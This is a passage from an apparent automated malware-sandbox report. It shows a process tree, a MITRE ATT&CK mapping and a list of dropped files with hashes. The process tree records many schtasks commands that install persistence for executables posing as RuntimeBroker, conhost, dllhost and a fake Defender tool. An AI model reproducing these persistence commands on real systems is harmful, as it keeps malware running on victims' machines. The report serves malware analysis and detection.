                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5212
                                                • C:\Windows\SysWOW64\WindowsInput.exe
                                                  "C:\Windows\SysWOW64\WindowsInput.exe"
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:6000
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "xdwdx" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office\PackageManifests\xdwd.exe'" /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:6004
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "xdwd" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\xdwd.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5880
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "xdwdx" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office\PackageManifests\xdwd.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5788
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5136
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:3944
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\MSBuild\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:772
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5560
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5324
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\ModemLogs\RuntimeBroker.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5428
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5544
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5600
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:6068
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\DiagTrack\Scenarios\dllhost.exe'" /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:6020
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\DiagTrack\Scenarios\dllhost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1700
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\DiagTrack\Scenarios\dllhost.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5804
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RunShellR" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5208
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RunShell" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5416
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /create /tn "RunShellR" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /rl HIGHEST /f
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:5512
                                                • C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe
                                                  C:\Users\Admin\AppData\Roaming\Windows\Helper\WinHelper32.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5512
                                                • C:\Windows\system32\taskmgr.exe
                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                  1⤵
                                                  • Checks SCSI registry key(s)
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:5348

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Reconnaissance

                                                Resource Development

                                                Initial Access

                                                Execution

                                                Command and Scripting Interpreter

                                                1
                                                T1059

                                                PowerShell

                                                1
                                                T1059.001

                                                Scheduled Task/Job

                                                1
                                                T1053

                                                Scheduled Task

                                                1
                                                T1053.005

                                                Persistence

                                                Boot or Logon Autostart Execution

                                                2
                                                T1547

                                                Registry Run Keys / Startup Folder

                                                1
                                                T1547.001

                                                Winlogon Helper DLL

                                                1
                                                T1547.004

                                                Create or Modify System Process

                                                1
                                                T1543

                                                Windows Service

                                                1
                                                T1543.003

                                                Hijack Execution Flow

                                                1
                                                T1574

                                                Executable Installer File Permissions Weakness

                                                1
                                                T1574.005

                                                Scheduled Task/Job

                                                1
                                                T1053

                                                Scheduled Task

                                                1
                                                T1053.005

                                                Privilege Escalation

                                                Abuse Elevation Control Mechanism

                                                1
                                                T1548

                                                Bypass User Account Control

                                                1
                                                T1548.002

                                                Boot or Logon Autostart Execution

                                                2
                                                T1547

                                                Registry Run Keys / Startup Folder

                                                1
                                                T1547.001

                                                Winlogon Helper DLL

                                                1
                                                T1547.004

                                                Create or Modify System Process

                                                1
                                                T1543

                                                Windows Service

                                                1
                                                T1543.003

                                                Hijack Execution Flow

                                                1
                                                T1574

                                                Executable Installer File Permissions Weakness

                                                1
                                                T1574.005

                                                Scheduled Task/Job

                                                1
                                                T1053

                                                Scheduled Task

                                                1
                                                T1053.005

                                                Defense Evasion

                                                Abuse Elevation Control Mechanism

                                                1
                                                T1548

                                                Bypass User Account Control

                                                1
                                                T1548.002

                                                Hijack Execution Flow

                                                1
                                                T1574

                                                Executable Installer File Permissions Weakness

                                                1
                                                T1574.005

                                                Impair Defenses

                                                3
                                                T1562

                                                Disable or Modify Tools

                                                3
                                                T1562.001

                                                Modify Registry

                                                6
                                                T1112

                                                Credential Access

                                                Credentials from Password Stores

                                                1
                                                T1555

                                                Credentials from Web Browsers

                                                1
                                                T1555.003

                                                Unsecured Credentials

                                                1
                                                T1552

                                                Credentials In Files

                                                1
                                                T1552.001

                                                Discovery

                                                Browser Information Discovery

                                                1
                                                T1217

                                                Peripheral Device Discovery

                                                1
                                                T1120

                                                Query Registry

                                                4
                                                T1012

                                                Remote System Discovery

                                                1
                                                T1018

                                                System Information Discovery

                                                5
                                                T1082

                                                System Location Discovery

                                                1
                                                T1614

                                                System Language Discovery

                                                1
                                                T1614.001

                                                System Network Configuration Discovery

                                                1
                                                T1016

                                                Internet Connection Discovery

                                                1
                                                T1016.001

                                                Lateral Movement

                                                Collection

                                                Data from Local System

                                                1
                                                T1005

                                                Command and Control

                                                Web Service

                                                1
                                                T1102

                                                Exfiltration

                                                Impact

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
                                                  Filesize

                                                  46B

                                                  MD5

                                                  9d217e75c67adfc4f1b0bb2173f7079d

                                                  SHA1

                                                  ef15d7a0ade540cb2d28be00f7242d43ae00008a

                                                  SHA256

                                                  930ca87c6495b7d37260f9447b3c68de3ae7dcccd40082d1958d502e39585781

                                                  SHA512

                                                  0df31d5ed3783196dbfdaf4df89820dbd621a2b38cee1f11bfac0ee6fad6a471aa41336d8789007240c35743502f0e20fef1983da57a34f76af300893685edf3

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                  Filesize

                                                  152B

                                                  MD5

                                                  b8880802fc2bb880a7a869faa01315b0

                                                  SHA1

                                                  51d1a3fa2c272f094515675d82150bfce08ee8d3

                                                  SHA256

                                                  467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

                                                  SHA512

                                                  e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                  Filesize

                                                  152B

                                                  MD5

                                                  ba6ef346187b40694d493da98d5da979

                                                  SHA1

                                                  643c15bec043f8673943885199bb06cd1652ee37

                                                  SHA256

                                                  d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

                                                  SHA512

                                                  2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                  Filesize

                                                  186B

                                                  MD5

                                                  094ab275342c45551894b7940ae9ad0d

                                                  SHA1

                                                  2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                                  SHA256

                                                  ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                                  SHA512

                                                  19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                  Filesize

                                                  5KB

                                                  MD5

                                                  b39da9a78fa0213d6e2ae6bb4de1c540

                                                  SHA1

                                                  16c79a560c8e43fba39b729aeb14f1d04b067d75

                                                  SHA256

                                                  ef2789ca208e1feca83e13950517406b6c95623d958b254991bf2640efe23fe7

                                                  SHA512

                                                  e48c1f8a4e1742d3b0498b86dd6a13c0974b0653b1b8fc24195a5449125f150fb8cc7695064faa95497f756835f13baf4029d2636734395e03c63f7a039a1deb

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                  Filesize

                                                  6KB

                                                  MD5

                                                  0a6225dadf80b01a8145c7949491f68f

                                                  SHA1

                                                  f44f77af8394473eff0259093a01bfddacec0d56

                                                  SHA256

                                                  a3c9509ecb8bc0367c02c1b682a60549b721aee46788eab4da0cff079a228cf0

                                                  SHA512

                                                  8b2a42e5989667d773f040baca2bad77629142452bd831d0bea1b5256f3f33db6d725f131d974cc3895bd9c3cf8997114afd2e52d085f25989a69fe651b64b14

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                  Filesize

                                                  6KB

                                                  MD5

                                                  b40d744bee9b79ab372e2c8d9b87d619

                                                  SHA1

                                                  bbf98144fda820aa00fa08dca436add71b87f8b9

                                                  SHA256

                                                  6d4b35f119529598667db40b51e7963f39f4b97e6692349a8805bf99426143a3

                                                  SHA512

                                                  c6cf3d0ca802ba244f165282eed5f466a763b741d0fe3620e28a6877a4afae34648f4b631cb7f138becc3ab3b6583b6f21b2470b1fa7ba43e5feb3f1f0e8c539

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                  Filesize

                                                  16B

                                                  MD5

                                                  6752a1d65b201c13b62ea44016eb221f

                                                  SHA1

                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                  SHA256

                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                  SHA512

                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                  Filesize

                                                  11KB

                                                  MD5

                                                  138053c04d605a89bb3afafdaeb34de4

                                                  SHA1

                                                  a2d6ae38bed5f72c7cdbd40a683ce0dea187f40f

                                                  SHA256

                                                  3885c5750a03007bfb102550a12d29cdac2ed6a1d1e1c43475ff561c9fdecb9d

                                                  SHA512

                                                  c7f2e980b6e25f9cef4f7602bb2fc382df54a4d4533627b2fa16abad6ea2b864d15b20c92c6bbba731075ab34f7d06ab884c4727eff6137344b78523d2eb888f

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                  Filesize

                                                  11KB

                                                  MD5

                                                  be7ff92a86d430783fe4f38d455d4da9

                                                  SHA1

                                                  686dbc07f4e939a676f821cd73094dfa67f9c93e

                                                  SHA256

                                                  38d0598b65a080e4aad7ea1d99ba15167b27db2fc594727d8ad51c821f6b7e6b

                                                  SHA512

                                                  42bb38edb3f1644f845575a2b237920db845960ce74ddd4148159e511d80e4bc0e8535866ef6c6d8a10020cfe703977b5bcd8f72cbc07ed74dde36aeb8bf6464

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  944B

                                                  MD5

                                                  77d622bb1a5b250869a3238b9bc1402b

                                                  SHA1

                                                  d47f4003c2554b9dfc4c16f22460b331886b191b

                                                  SHA256

                                                  f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                  SHA512

                                                  d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  944B

                                                  MD5

                                                  ef72c47dbfaae0b9b0d09f22ad4afe20

                                                  SHA1

                                                  5357f66ba69b89440b99d4273b74221670129338

                                                  SHA256

                                                  692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

                                                  SHA512

                                                  7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  944B

                                                  MD5

                                                  98baf5117c4fcec1692067d200c58ab3

                                                  SHA1

                                                  5b33a57b72141e7508b615e17fb621612cb8e390

                                                  SHA256

                                                  30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                                                  SHA512

                                                  344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  944B

                                                  MD5

                                                  6dceabe4fa04675b346d77bdb6f001b6

                                                  SHA1

                                                  f7e0a381146b85d36cd7010faca05d26950a3c13

                                                  SHA256

                                                  32dd8227622e50d2938effe8f870632b0105a9906baf4a0779b48511fb214204

                                                  SHA512

                                                  b7c611cba5e55f72a8656b98ca056f44fe869c90629143b0ba27ddc02d3afe79690671130e541c434540cb485c1bd31cb3ac4e4b8129ec4bac2ae58f1a5bd9ad

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  944B

                                                  MD5

                                                  08526e4d8fed0a382c243c9aa8b1fe45

                                                  SHA1

                                                  f3da4b97529aaa38230db8bfa34a345bbc211622

                                                  SHA256

                                                  b5044625d66b7835745c7c4efa14d21aaf4ee42bf971f8bbc44f04416b91441f

                                                  SHA512

                                                  cbeb569db60eabd89c13b073f1bdf7ba991b6206e75f548396a150b08a0ffed1962d88d664e069c64ac740afbb69941df2f43e81a3f138e2185934967898941d

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  944B

                                                  MD5

                                                  c65338524586fc00cf00e679a7d4a1f4

                                                  SHA1

                                                  62abf26bfb979dcbf7c7649cf8a681c2a8c7c9ae

                                                  SHA256

                                                  faa246e6b356f55ad8b18cea908dbf9035f67feaa06f8259d934306e13e88bf6

                                                  SHA512

                                                  c6721362afa4998c60ff60225a7b7571aaf1dbc8cb624ad7557b365a37df26e629763fa052dc31904b3175587e940d7e0630362620870c2c7351960a14c29310

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Filesize

                                                  18KB

                                                  MD5

                                                  1a4203c0b88884aa859431c26b0947f2

                                                  SHA1

                                                  36ce9a896b92c39ac8d2685beeecbb59d523951b

                                                  SHA256

                                                  88f1d0b172d56a66b0b6be9377a312bca904d30976d376e7a3f25afbfae7f4a0

                                                  SHA512

                                                  2640243ac632309464f83ce43ae7e4c4bda3511de80f9543f6ef07575e2a185a3873bdbda4b2f22c22cdb2724ae7a8133723a7f2091fcdfae12521a4355933a2

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Temp\RESDD31.tmp
                                                  Filesize

                                                  1KB

                                                  MD5

                                                  e758c5097c2336e3c79b19a8d3333fac

                                                  SHA1

                                                  c77e35d8f3d1d7dbb9884b77e019f262b1100d71

                                                  SHA256

                                                  678d55a08ac037700e977e41dd9868243da1e3f204d2b7f1cf7c1333e9ba4c6e

                                                  SHA512

                                                  af91e6d4f3aad3bb379a4d748729941cea48004bff60f974cb825b031248bf18a4a89f8b9bd22a2f1c818372ff5c0657dd47db4504e71e302071668321f2a68e

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxid3zqo.z4a.ps1
                                                  Filesize

                                                  60B

                                                  MD5

                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                  SHA1

                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                  SHA256

                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                  SHA512

                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Local\Temp\lLSWsfpTer.bat
                                                  Filesize

                                                  166B

                                                  MD5

                                                  aa76ba71bc95b413f2b5bbe2f9b7f85f

                                                  SHA1

                                                  4ddd0e950f14e9d0e540cf7fb5b8c40229cea12b

                                                  SHA256

                                                  b7c02e487ebad528f14e44cce2eaef23cca80e8ba519abe19156cac4064c155e

                                                  SHA512

                                                  6d05710e4649c6d41acc3fad9accdfe1856aa942688346440bc710d7b9b0fd06ebebb81880058bc99f0a8a1f047cbd8dc498a129e68f919cafaa13feee7b2a4d

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\83aa4cc77f591dfc2374580bbd95f6ba_5ab270f5-f3a9-47d1-97d7-bbd50acf9955
                                                  Filesize

                                                  45B

                                                  MD5

                                                  c8366ae350e7019aefc9d1e6e6a498c6

                                                  SHA1

                                                  5731d8a3e6568a5f2dfbbc87e3db9637df280b61

                                                  SHA256

                                                  11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238

                                                  SHA512

                                                  33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\WinHelperWatchdog.exe
                                                  Filesize

                                                  9KB

                                                  MD5

                                                  7a195b6c9de2d5cab015f649da6931a1

                                                  SHA1

                                                  89f7372dd92a90a8e13b74ee512b464412e4cf9b

                                                  SHA256

                                                  30183935449a625c2a61f6342dc3b9907028194173f2e3d594eaa3126ee316bc

                                                  SHA512

                                                  3c2aeef85b51e7f955072fba042bcedf8dd0b66ad813def58c0134355665ba56a713d58005a322561c62be5777d0adea2803da214459f362f22fe2a0dba5a1c7

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinHelper32.exe
                                                  Filesize

                                                  4.9MB

                                                  MD5

                                                  72982e4d77aaee2ef6d16876037b3dbe

                                                  SHA1

                                                  bfffbe69bfc0cb1fb5e23199dba5ea69c4f3d9df

                                                  SHA256

                                                  bbe1c2a2af47b4e32fa9b6e8a44da455473604bd1aae5481524403f878a86662

                                                  SHA512

                                                  cb28f33f6c3acaa74ddb3e9f50922e764926fbf2b8a3d7317f13b57f6f30e259a5a8b0213c77dee27cf542ad860762909c1f46f695f2b2c45bb778de957f02db

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\Windows\Defender\Boostrapper.exe
                                                  Filesize

                                                  2.2MB

                                                  MD5

                                                  f21f63c5ac1e7afc50125b10c75e30af

                                                  SHA1

                                                  09be95306a2e9f48934b6f3ec4e789eefaaefc94

                                                  SHA256

                                                  a4bf1fbf3c41613a6ca44ec770bca60ed1a23206bd01a2296513c302ff63e046

                                                  SHA512

                                                  681ba321321fe8c856a1d6d3de10f23e4f313d943e0e83abfa4ab575cc8932b8be28024eaec282f21dabafa4848b9305d4a15bbd3db7591bccf46d1ee369d58c

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe
                                                  Filesize

                                                  427KB

                                                  MD5

                                                  8d860de39a47014bb85432844205defc

                                                  SHA1

                                                  16b6485662cc4b57af26f1ee2fe5e5595156264d

                                                  SHA256

                                                  6f64566b9adc350458221bc7312acaa09290c58241659336b9921c3dcf27fbbb

                                                  SHA512

                                                  c76408b4390d9aeae243f7333c5acdc68b6fe08efd1694c774069627d09e91e97ab1a5ccf55b60a247f3b00e8b95166d3dfcc41ac92150f00dfb897480a5a539

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\Windows\Defender\xdwd.exe
                                                  Filesize

                                                  3.0MB

                                                  MD5

                                                  c33b516c2f5105562cc621929d2f3a5a

                                                  SHA1

                                                  ac89044573fc5b586b43c1bf784c3bcc50a46c1f

                                                  SHA256

                                                  42fcea19c41fd2e09ce01b6f0f48027f7f58aac75f93b7aeae8d24af7eb23f3c

                                                  SHA512

                                                  eace4742d8f75a2093cfeab3cd20f8ddb23514f6d5a598b16927621afc6e2bc4dff58d775e0c2c261f7c1ffc20a4b7d1004fe1ef8c7f904d8ef1cd94636caec6

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\Windows\Defender\yjJlDaeiCtZ3rPY3voT8EfypAtNWVOHqwTO.vbe
                                                  Filesize

                                                  249B

                                                  MD5

                                                  5299f191d092a082374029620d0184cd

                                                  SHA1

                                                  154c0f2d892c0dde9914e1d2e114995ab5f1a8cb

                                                  SHA256

                                                  9c46745f3776d8f344029103da41e060516a4bf324e7238b112a3069abececf9

                                                  SHA512

                                                  670159a1352e91ad4739903c7d5bbca2b91e81ab542ac6b4532db8701d5bf01b900909812164db6ce4dbdc2fc1af59593d9abc84daff835de07eb7d383869e39

                                                  Download Submit

                                                • C:\Users\Admin\AppData\Roaming\Windows\Defender\zHxvwMPtXsd9EflNyF6bR38DTMh313hvK806W5p8W9mTT85g.bat
                                                  Filesize

                                                  104B

                                                  MD5

                                                  b33c8997ecd39b1b7e8af929abd526c7

                                                  SHA1

                                                  e30e21ca9e74d508cfc35e9affd57a7fbc089a77

                                                  SHA256

                                                  71340cb564242cd1454892eaa33aae6eaf8e444d9301731753a9aa993bb9785c

                                                  SHA512

                                                  394a9df69628162228d6a8934d6df532d5055a65a41788ef7d2b8170fae3bd586d80c8592ebc10e32650b81d43efd2eefdef865523d687b6def20fe4374afefc

                                                  Download Submit

                                                • C:\Users\Admin\Downloads\Unconfirmed 290889.crdownload
                                                  Filesize

                                                  113KB

                                                  MD5

                                                  7cf417d06a24c1ade73ec6d8ae589077

                                                  SHA1

                                                  128516790f9c6d8ac1d33a9f1f2b854162d94942

                                                  SHA256

                                                  270723a06c0f917204923693f09cc0d6cd2cc9cefd59fc051cfbf920d26f17d8

                                                  SHA512

                                                  3f5615b04489cfc755e19efc30fe619026dfacd250bb1c1677e1c55ceb6f69a80d0f05760c157696985e1090c34e8e403b453e5680fb981f274bdd66e2fcb5bb

                                                  Download Submit

                                                • C:\Windows\SysWOW64\WindowsInput.exe
                                                  Filesize

                                                  21KB

                                                  MD5

                                                  f6285edd247fa58161be33f8cf662d31

                                                  SHA1

                                                  e2b49bca43cd0bd6cc1eee582ba58f0ed6de1470

                                                  SHA256

                                                  bc16993d1a774793044ca37eb2ce84ecbdb5c578e3c710ed82879e07dcef2fec

                                                  SHA512

                                                  6f3e6073a1dafc679da1caa4a4c9cb7cc2da79c3f81034d7b7b7b1d855fd5421cbb517a7d3f9520f49d4d3b7f9577f4f8f92486994c8b78fabff5033b390a788

                                                  Download Submit

                                                • C:\Windows\SysWOW64\WindowsInput.exe.config
                                                  Filesize

                                                  349B

                                                  MD5

                                                  89817519e9e0b4e703f07e8c55247861

                                                  SHA1

                                                  4636de1f6c997a25c3190f73f46a3fd056238d78

                                                  SHA256

                                                  f40dfaa50dcbff93611d45607009158f798e9cd845170939b1d6088a7d10ee13

                                                  SHA512

                                                  b017cb7a522b9c6794f3691cb7266ec82f565a90d7d07cc9beb53b939d2e9bf34275bc25f6f32d9a9c7136a0aab2189d9556af7244450c610d11ed7a4f584ba3

                                                  Download Submit

                                                • C:\blockComAgentdll\Q5HIcCBrM4kJ2gRS.bat
                                                  Filesize

                                                  98B

                                                  MD5

                                                  1316b7f40530ee0c903a091d248c63dd

                                                  SHA1

                                                  6e9322f825d3d18a712458d98430a54b17c9f904

                                                  SHA256

                                                  43c1d785f81931b200e0be0a9fc40a736f26f397fda6571e26f52c21acf1065f

                                                  SHA512

                                                  1c9a435ca6d25466b715d2d4505dc33d42ab33fe192e89820929ee01b1962a2128c0ce9281ae96d27a9c18a4d035e55d912f673e17c6e7936d96160fea253345

                                                  Download Submit

                                                • C:\blockComAgentdll\hypercommonSvc.exe
                                                  Filesize

                                                  1.9MB

                                                  MD5

                                                  c9cda0ef2f246e5a640c25ff468a87a4

                                                  SHA1

                                                  44c7046f6251c49905cc569d1836361d0ae7856a

                                                  SHA256

                                                  cc66b2f2a0bcd9104078ed351c6b313a488f6b895c5fef9743b227c0397c4d6f

                                                  SHA512

                                                  2731df92281b29a4421b5071891676a4048bb39378956674c99dddea5b27f7684c71b7e3808942fd758c3c60e3eae93da535de95d702a3ae6f8829aae598ff21

                                                  Download Submit

